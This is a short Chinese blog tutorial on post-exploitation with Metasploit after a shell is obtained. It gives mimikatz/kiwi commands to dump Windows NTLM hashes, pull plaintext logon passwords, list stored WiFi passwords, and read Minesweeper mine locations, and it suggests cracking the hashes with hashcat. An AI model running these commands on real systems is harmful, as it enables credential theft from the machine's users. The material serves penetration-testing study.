渗透测试之提权篇

博主： literature
发布时间：2020 年 05 月 05 日
150 次浏览
关闭评论
512字数
分类：主机教程

利用msf获得系统shell后，就完了？ no~ 我们的渗透之路才刚刚开始。系统提权，权限维持，这些都是最基本的操作，除了这些还有那些好玩的呢？

获取明文密码

如下，我们在msf中获得shell后，载入mimikatz模块load mimikatz

这里提示，需要载入kiwi我们再次载入

获取系统hash值

mimikatz_command -f samdump::hashes

参数说明：
user:用户名
NTLM:hash值（如果获取明文失败，我们可以直接利用hashcat暴力破解）
获取密码明文

mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest

获取目标WiFi密码

wifi_list_shared

获取扫雷的位置

mimikatz_command -f winmine::infos

版权属于：逍遥子大表哥

本文链接：https://blog.bbskali.cn/1971.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

最后修改：2023 年 08 月 04 日

如果觉得我的文章对你有用，请随意赞赏

此处评论已关闭

渗透测试之提权篇

literature • 2020 年 05 月 05 日

<p>利用msf获得系统shell后，就完了？ no~ 我们的渗透之路才刚刚开始。系统提权，权限维持，这些都是最基本的操作，除了这些还有那些好玩的呢？<br /><img src="https://blog.bbskali.cn/usr/uploads/2020/05/4276225268.jpg" alt="msf渗透测试" title="msf渗透测试" style="" class="aligncenter"style=""></p><h3>获取明文密码</h3><p>如下，我们在msf中获得shell后，载入mimikatz模块<code>load mimikatz</code><br /><img src="https://niu.bbskali.cn/8d902f9b808f7797d29fc64bc47ee5a6-blogsy" alt="load mimikatz" title="load mimikatz" style="" class="aligncenter"style=""><br />这里提示，需要载入<code>kiwi</code>我们再次载入<br /><img src="https://niu.bbskali.cn/dda814dd27b273685ba2cbf9d0092de8-blogsy" alt="load kiwi" title="load kiwi" style="" class="aligncenter"style=""><br />获取系统hash值</p><pre><code>mimikatz_command -f samdump::hashes</code></pre><p><img src="https://niu.bbskali.cn/f0bb20c58c25dca7288b4fa087bb6ee8-blogsy" alt="" title="" style="" class="aligncenter"style=""><br /><strong>参数说明：</strong><br /><code>user:</code>用户名<br /><code>NTLM:</code>hash值（如果获取明文失败，我们可以直接利用hashcat暴力破解）<br />获取密码明文</p><pre><code>mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest</code></pre><p><img src="https://niu.bbskali.cn/fcb861e30263a8dae8e13c1015581d21-blogsy" alt="" title="" style="" class="aligncenter"style=""></p><h3>获取目标WiFi密码</h3><pre><code>wifi_list_shared</code></pre><p><img src="https://niu.bbskali.cn/66e5d0313e513734de2f1190ebfe579d-blogsy" alt="wifipass" title="wifipass" style="" class="aligncenter"style=""></p><h3>获取扫雷的位置</h3><p><code>mimikatz_command -f winmine::infos</code></p><p><hr class="content-copyright" style="margin-top:50px"></p><div class="post-copyright" style="font-style:normal"><p class="iconfont-copyright"><i class="glyphicon glyphicon-copyright-mark"></i></p><p class="content-copyright">版权属于：逍遥子大表哥</p><p class="content-copyright">本文链接：https://blog.bbskali.cn/1971.html</p><p class="content-copyright">按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。</p></div>

渗透测试之提权篇

获取明文密码

获取目标WiFi密码

获取扫雷的位置

live/msn等微软绝版邮箱详细的注册教程

欢迎使用 Typecho

一个功能强大又好用的RSS订阅器：FreshRSS安装教程

VPS使用BaiduPCS-Go高速下载百度网盘的文件，支持上传/离线下载等操作

使用Caddy申请免费的Let’s Encrypt泛域名SSL证书

本站已经使用的防cc源码分享

《一个好人》- 星泽V社

关于宝塔新建站点500状态码的解决

基于Shell编写的服务器探针

给网站添加pjax无刷新，换页音乐不中断

渗透测试之提权篇